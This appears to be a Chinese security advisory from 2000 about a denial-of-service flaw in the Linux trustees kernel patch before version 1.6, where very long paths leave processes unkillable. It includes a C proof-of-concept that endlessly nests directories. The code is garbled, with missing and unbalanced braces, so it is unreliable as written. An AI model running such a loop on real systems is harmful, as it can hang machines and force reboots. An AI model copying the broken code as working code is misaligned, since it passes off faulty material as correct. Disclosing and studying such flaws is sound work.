发布日期：2000-04-11
更新日期：2000-04-11

受影响系统：

trustees 1.5 for linux 2.2.14
版本号低于 1.6  的 linux trustees

不受影响系统：

高于 1.6 的 linux trustees

描述：

---

   Linux trustees  是一个给Linux 提供类似于Netware支持的内核Patch,缺省情况
   下并没有安装。在安装了有问题的  Linux trustees 的系统中，当进程访问一个带
   有长路径的文件或目录时，该进程就会处于一种不能被杀死的状态。
   所有其他的进程访问该进程的 /proc 入口时就会出错. 一些系统工具如ps, w,top,
   killall,就会停止工作。这时就只能通过重新启动系统来解决。
   值得注意的是该漏洞不一定限于本地，在远程访问系统时也有可能出现。

<* 来源： Andrey E. Lerman (lae@UNIYAR.AC.RU) *>




测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

    #include <stdio.h>
    #include <sys/stat.h>
    #include <sys/types.h>
    #include <fcntl.h>
    #include <unistd.h>

   int main(void)
  {
        while(1)

        if(mkdir("aaaa",0777)<0)

                perror("mkdir");
                exit(1);
                }
        if(chdir("aaaa")<0)

                perror("chdir");
                exit(1);
                }
        }
   return(0);
  }



建议：

---

在高于 1.6 的 linux trustees 中已经修复。

浏览次数：5998
严重程度：0（网友投票）